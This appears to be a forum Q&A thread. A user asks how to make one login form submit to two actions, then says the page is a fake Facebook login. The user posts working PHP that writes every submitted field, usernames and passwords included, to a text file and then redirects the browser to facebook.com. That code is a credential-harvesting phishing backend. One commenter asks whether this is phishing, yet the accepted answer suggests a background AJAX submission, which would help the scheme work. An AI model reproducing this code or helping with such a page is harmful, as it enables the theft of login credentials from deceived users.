# HTML | One form One submit Two action

Tags: html

. .
i want to create one form with two actions and one submit in html!!
my page is login page . . .one action for login ...and the other one for my php script that save usernames and passwords in a text file!
please help me . . . TNX!

Comment: I don't see why you need 2 actions, one php script can handle this

Comment: one form with two actions? Sounds like you need two forms each with one action (1 form for login and 1 for registration).

Comment: `save usernames and passwords in a text file`. Oh lawd....please let me know what your website is, so I make sure I never login.

Comment: You want to save the username and password on local machine or on server?

Comment: @DigvijayYadav  no difference!! on local or on server!!

Comment: Then as suqqested by @soju first before logging in your php script you can do the saving stuff and after that logging.

Answer (score 0, accepted):

Probably you need a background action to achieve this using ajax.

Comment: Marvin Lara !! yes....i want to do that!!my login page is like some fake pages!!
for example : i want to create facebook fake page! when user login with his/her username & password one action is for main login and the other one is my php script that save these username & pass to a text file!

Comment: <?php
    header ('Location:http://facebook.com');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 


this is my php code to do that!!

Comment: do you try to make phishing ??

Comment: Seems not a good idea and will cause you issue and problem in the future.